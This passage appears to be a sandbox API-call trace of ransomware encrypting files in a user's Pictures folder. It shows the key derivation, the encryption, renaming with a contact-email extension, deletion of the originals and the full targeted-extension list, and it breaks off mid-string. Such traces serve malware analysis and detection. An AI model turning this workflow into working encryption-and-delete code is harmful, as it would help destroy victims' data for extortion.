	[0195.476] CryptEncrypt (in: hKey=0xfb98f0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfe4790*, pdwDataLen=0x18bc0c*=0x7601, dwBufLen=0x7610 | out: pbData=0xfe4790*, pdwDataLen=0x18bc0c*=0x7610) returned 1
	[0195.530] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0195.530] CryptDestroyKey (hKey=0xfb98f0) returned 1
	[0195.530] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0195.530] CryptDestroyHash (hHash=0xfb9bf0) returned 1
	[0195.530] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0195.531] CryptReleaseContext (hProv=0xfcb770, dwFlags=0x0) returned 1
	[0195.531] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0195.531] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18bc28, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18bc28*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0195.532] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0195.532] GetUserNameA (in: lpBuffer=0x18bb0c, pcbBuffer=0x18bc24 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18bc24) returned 1
	[0195.533] wsprintfW (in: param_1=0x18bc40, param_2="%s.id_%x%x_email_enc2@dr.com_.scl" | out: param_1="c:\\users\\rdhj0cnfevzx\\pictures\\7n6b8ii7i7.gif.id_c287f3826d6e218_email_enc2@dr.com_.scl") returned 87
	[0195.533] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\pictures\\7n6b8ii7i7.gif.id_c287f3826d6e218_email_enc2@dr.com_.scl" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\7n6b8ii7i7.gif.id_c287f3826d6e218_email_enc2@dr.com_.scl"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c0
	[0195.533] WriteFile (in: hFile=0x2c0, lpBuffer=0xfe4790*, nNumberOfBytesToWrite=0x7610, lpNumberOfBytesWritten=0x18c068, lpOverlapped=0x0 | out: lpBuffer=0xfe4790*, lpNumberOfBytesWritten=0x18c068*=0x7610, lpOverlapped=0x0) returned 1
	[0195.537] CloseHandle (hObject=0x2c0) returned 1
	[0195.538] CloseHandle (hObject=0x384) returned 1
	[0195.538] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\pictures\\7n6b8ii7i7.gif" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\7n6b8ii7i7.gif")) returned 1
	[0195.547] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\pictures\\7n6b8ii7i7.gif" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\7n6b8ii7i7.gif")) returned 0
	[0195.548] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3eefbca0, ftCreationTime.dwHighDateTime=0x1d970c4, ftLastAccessTime.dwLowDateTime=0x77310bd0, ftLastAccessTime.dwHighDateTime=0x1d9747c, ftLastWriteTime.dwLowDateTime=0x77310bd0, ftLastWriteTime.dwHighDateTime=0x1d9747c, nFileSizeHigh=0x0, nFileSizeLow=0x1a55, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="7qtTM9h2xfJ.gif", cAlternateFileName="7QTTM9~1.GIF")) returned 1
	[0195.548] lstrcmpW (lpString1="7qtTM9h2xfJ.gif", lpString2="..") returned 1
	[0195.548] lstrcmpW (lpString1="7qtTM9h2xfJ.gif", lpString2=".") returned 1
	[0195.548] lstrcpyW (in: lpString1=0x18cb04, lpString2="C:\\Users\\RDhJ0CNFevzX\\Pictures\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Pictures\\") returned="C:\\Users\\RDhJ0CNFevzX\\Pictures\\"
	[0195.548] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Pictures\\", lpString2="7qtTM9h2xfJ.gif" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Pictures\\7qtTM9h2xfJ.gif") returned="C:\\Users\\RDhJ0CNFevzX\\Pictures\\7qtTM9h2xfJ.gif"
	[0195.548] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Pictures\\7qtTM9h2xfJ.gif") returned 46
	[0195.548] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0195.548] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Pictures\\7qtTM9h2xfJ.gif", cchLength=0x2e | out: lpsz="c:\\users\\rdhj0cnfevzx\\pictures\\7qttm9h2xfj.gif") returned 0x2e
	[0195.549] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0195.549] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\pictures\\7qttm9h2xfj.gif", lpSrch="help_decrypt_your_files") returned 0x0
	[0195.549] lstrcpyW (in: lpString1=0x18c6ac, lpString2="c:\\users\\rdhj0cnfevzx\\pictures\\7qttm9h2xfj.gif" | out: lpString1="c:\\users\\rdhj0cnfevzx\\pictures\\7qttm9h2xfj.gif") returned="c:\\users\\rdhj0cnfevzx\\pictures\\7qttm9h2xfj.gif"
	[0195.549] lstrlenW (lpString="c:\\users\\rdhj0cnfevzx\\pictures\\7qttm9h2xfj.gif") returned 46
	[0195.549] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0195.549] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0195.549] StrStrW (lpFirst=".gif", lpSrch=".") returned=".gif"
	[0195.550] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0195.550] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".gif") returned=".gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim"
	[0195.550] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0195.550] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0195.550] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\pictures\\7qttm9h2xfj.gif" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\7qttm9h2xfj.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0195.551] ReadFile (in: hFile=0x384, lpBuffer=0xfda128, nNumberOfBytesToRead=0x1a55, lpNumberOfBytesRead=0x18c060, lpOverlapped=0x0 | out: lpBuffer=0xfda128*, lpNumberOfBytesRead=0x18c060*=0x1a55, lpOverlapped=0x0) returned 1
	[0195.553] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0195.553] CryptAcquireContextW (in: phProv=0x18bc10, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18bc10*=0xfcb2a8) returned 1
	[0195.555] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0195.556] CryptCreateHash (in: hProv=0xfcb2a8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x18bc14 | out: phHash=0x18bc14) returned 1
	[0195.556] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0195.556] CryptHashData (hHash=0xfb9b30, pbData=0xfc0b90, dwDataLen=0x10c, dwFlags=0x0) returned 1
	[0195.556] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0195.556] CryptDeriveKey (in: hProv=0xfcb2a8, Algid=0x6610, hBaseData=0xfb9b30, dwFlags=0x1, phKey=0x18bc18 | out: phKey=0x18bc18*=0xfb9bf0) returned 1
	[0195.556] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0195.556] CryptEncrypt (in: hKey=0xfb9bf0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x18bc2c*=0x1a55, dwBufLen=0x1a55 | out: pbData=0x0*, pdwDataLen=0x18bc2c*=0x1a60) returned 1
	[0195.563] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0195.564] RtlMoveMemory (in: Destination=0xfdd180, Source=0xfda128, Length=0x1a55 | out: Destination=0xfdd180) 
	[0195.564] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0195.564] CryptEncrypt (in: hKey=0xfb9bf0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfdd180*, pdwDataLen=0x18bc0c*=0x1a55, dwBufLen=0x1a60 | out: pbData=0xfdd180*, pdwDataLen=0x18bc0c*=0x1a60) returned 1
	[0195.564] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0195.564] CryptDestroyKey (hKey=0xfb9bf0) returned 1
	[0195.564] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0195.564] CryptDestroyHash (hHash=0xfb9b30) returned 1
	[0195.564] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0195.565] CryptReleaseContext (hProv=0xfcb2a8, dwFlags=0x0) returned 1
	[0195.565] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0195.565] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18bc28, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18bc28*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0195.565] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0195.566] GetUserNameA (in: lpBuffer=0x18bb0c, pcbBuffer=0x18bc24 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18bc24) returned 1
	[0195.566] wsprintfW (in: param_1=0x18bc40, param_2="%s.id_%x%x_email_enc2@dr.com_.scl" | out: param_1="c:\\users\\rdhj0cnfevzx\\pictures\\7qttm9h2xfj.gif.id_c287f3826d6e218_email_enc2@dr.com_.scl") returned 88
	[0195.567] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\pictures\\7qttm9h2xfj.gif.id_c287f3826d6e218_email_enc2@dr.com_.scl" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\7qttm9h2xfj.gif.id_c287f3826d6e218_email_enc2@dr.com_.scl"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c0
	[0195.567] WriteFile (in: hFile=0x2c0, lpBuffer=0xfdd180*, nNumberOfBytesToWrite=0x1a60, lpNumberOfBytesWritten=0x18c068, lpOverlapped=0x0 | out: lpBuffer=0xfdd180*, lpNumberOfBytesWritten=0x18c068*=0x1a60, lpOverlapped=0x0) returned 1
	[0195.570] CloseHandle (hObject=0x2c0) returned 1
	[0195.571] CloseHandle (hObject=0x384) returned 1
	[0195.571] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\pictures\\7qttm9h2xfj.gif" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\7qttm9h2xfj.gif")) returned 1
	[0195.575] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\pictures\\7qttm9h2xfj.gif" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\7qttm9h2xfj.gif")) returned 0
	[0195.575] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x2b0e752d, ftCreationTime.dwHighDateTime=0x1d70504, ftLastAccessTime.dwLowDateTime=0x2b10dbc5, ftLastAccessTime.dwHighDateTime=0x1d70504, ftLastWriteTime.dwLowDateTime=0x2b10dbc5, ftLastWriteTime.dwHighDateTime=0x1d70504, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Camera Roll", cAlternateFileName="CAMERA~1")) returned 1
	[0195.575] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x435fd682, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x435fd682, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x436238c4, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1
	[0195.576] lstrcmpW (lpString1="desktop.ini", lpString2="..") returned 1
	[0195.576] lstrcmpW (lpString1="desktop.ini", lpString2=".") returned 1
	[0195.576] lstrcpyW (in: lpString1=0x18cb04, lpString2="C:\\Users\\RDhJ0CNFevzX\\Pictures\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Pictures\\") returned="C:\\Users\\RDhJ0CNFevzX\\Pictures\\"
	[0195.576] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Pictures\\", lpString2="desktop.ini" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Pictures\\desktop.ini") returned="C:\\Users\\RDhJ0CNFevzX\\Pictures\\desktop.ini"
	[0195.576] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Pictures\\desktop.ini") returned 42
	[0195.576] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0195.576] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Pictures\\desktop.ini", cchLength=0x2a | out: lpsz="c:\\users\\rdhj0cnfevzx\\pictures\\desktop.ini") returned 0x2a
	[0195.576] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0195.576] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\pictures\\desktop.ini", lpSrch="help_decrypt_your_files") returned 0x0
	[0195.577] lstrcpyW (in: lpString1=0x18c6ac, lpString2="c:\\users\\rdhj0cnfevzx\\pictures\\desktop.ini" | out: lpString1="c:\\users\\rdhj0cnfevzx\\pictures\\desktop.ini") returned="c:\\users\\rdhj0cnfevzx\\pictures\\desktop.ini"
	[0195.577] lstrlenW (lpString="c:\\users\\rdhj0cnfevzx\\pictures\\desktop.ini") returned 42
	[0195.577] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0195.577] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0195.577] StrStrW (lpFirst=".ini", lpSrch=".") returned=".ini"
	[0195.577] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0195.577] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.